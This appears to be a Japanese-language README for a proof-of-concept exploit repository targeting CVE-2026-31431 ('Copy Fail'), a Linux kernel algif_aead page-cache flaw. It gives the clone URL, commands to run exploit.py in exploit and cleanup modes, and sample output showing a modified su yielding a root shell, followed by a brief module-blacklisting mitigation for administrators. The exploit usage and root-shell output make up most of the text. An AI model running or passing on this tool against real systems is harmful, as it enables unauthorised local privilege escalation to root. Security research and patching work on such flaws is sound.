
CVE-2026-31431 - Linuxカーネルのページキャッシュ脆弱性
このプロジェクトは厳密に以下の目的で提供されます:
著者および寄稿者は、本ソフトウェアを使用して行われた誤用、損害、データ損失、サービス中断、または違法行為について一切責任を負いません。
CVE-2026-31431(別名**「コピー失敗」**)の概念実証研究ツールです。これはLinuxカーネルの脆弱性で、algif_aead / authencesn AEAD実装に影響を与えます。
この脆弱性は特定の条件下でページキャッシュの破損を引き起こす可能性があり、脆弱なシステム上でローカル権限昇格につながる恐れがあります。
リポジトリをクローンします:
git clone https://github.com/Lutfifakee-Project/CVE-2026-31431.git
cd CVE-2026-31431
python3 exploit.py
python3 exploit.py --exploit
プロンプトが表示されたら:
Type 'YES' to continue
python3 exploit.py --cleanup
python3 exploit.py --help
$ python3 exploit.py --exploit
[!] DANGER ZONE: Exploit mode
Type 'YES' to continue: YES
[*] CVE-2026-31431 Copy Fail Exploit
[+] Page cache patching complete!
[+] Executing modified su...
# id
uid=0(root) gid=1001(user)
システム管理者で、露出を緩和する必要がある場合は:
echo "install algif_aead /bin/false" | sudo tee /etc/modprobe.d/disable-algif-aead.conf
sudo rmmod algif_aead 2>/dev/null